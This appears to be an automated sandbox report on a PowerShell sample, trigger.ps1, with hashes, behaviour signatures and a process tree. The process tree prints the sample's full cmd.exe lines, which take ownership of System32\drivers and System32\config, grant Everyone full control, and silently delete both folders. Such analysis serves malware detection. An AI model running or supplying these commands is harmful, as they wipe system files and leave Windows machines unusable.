Analysis
-
max time kernel
2s -
max time network
1s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
13-08-2024 20:52
Static task
static1
Behavioral task
behavioral1
Sample
trigger.ps1
Resource
win7-20240708-en
6 signatures
150 seconds
General
-
Target
trigger.ps1
-
Size
361B
-
MD5
f027721d34b4dd5220b236a39b0f75a8
-
SHA1
b31847f44624ca0c7a53cd9a01f187bad6c4e88c
-
SHA256
c0979852c32530744818450613b30e9bb81ee684239d189034ed3cee80fb5ae6
-
SHA512
74d9aaf78e525a90cff77a32aed86a4fa594be69bec74ea354f1b471818fbef42616ee5b9cbdea0faaafe2d2d7d5f6a9b4b97be0dc91e528837fa3f8ac281b48
Malware Config
Signatures
-
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2724 takeown.exe 2756 icacls.exe 2800 takeown.exe 2888 icacls.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 2724 takeown.exe 2756 icacls.exe 2800 takeown.exe 2888 icacls.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exetakeown.exedescription pid process Token: SeDebugPrivilege 2700 powershell.exe Token: SeTakeOwnershipPrivilege 2800 takeown.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
powershell.execmd.execmd.exedescription pid process target process PID 2700 wrote to memory of 2836 2700 powershell.exe cmd.exe PID 2700 wrote to memory of 2836 2700 powershell.exe cmd.exe PID 2700 wrote to memory of 2836 2700 powershell.exe cmd.exe PID 2836 wrote to memory of 2800 2836 cmd.exe takeown.exe PID 2836 wrote to memory of 2800 2836 cmd.exe takeown.exe PID 2836 wrote to memory of 2800 2836 cmd.exe takeown.exe PID 2836 wrote to memory of 2888 2836 cmd.exe icacls.exe PID 2836 wrote to memory of 2888 2836 cmd.exe icacls.exe PID 2836 wrote to memory of 2888 2836 cmd.exe icacls.exe PID 2700 wrote to memory of 2044 2700 powershell.exe cmd.exe PID 2700 wrote to memory of 2044 2700 powershell.exe cmd.exe PID 2700 wrote to memory of 2044 2700 powershell.exe cmd.exe PID 2044 wrote to memory of 2724 2044 cmd.exe takeown.exe PID 2044 wrote to memory of 2724 2044 cmd.exe takeown.exe PID 2044 wrote to memory of 2724 2044 cmd.exe takeown.exe PID 2044 wrote to memory of 2756 2044 cmd.exe icacls.exe PID 2044 wrote to memory of 2756 2044 cmd.exe icacls.exe PID 2044 wrote to memory of 2756 2044 cmd.exe icacls.exe
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\trigger.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2700 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\drivers\* >nul && icacls C:\Windows\System32\drivers\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\drivers\* >nul 2>&1 && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2888
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k "takeown /f C:\Windows\System32\config\* >nul && icacls C:\Windows\System32\config\* /grant everyone:(f) >nul && del /s /q C:\Windows\System32\config\* >nul 2>&1 && exit"2⤵
- Suspicious use of WriteProcessMemory
PID:2044 -
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\config\*3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2724
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\config\* /grant everyone:(f)3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2756
-
-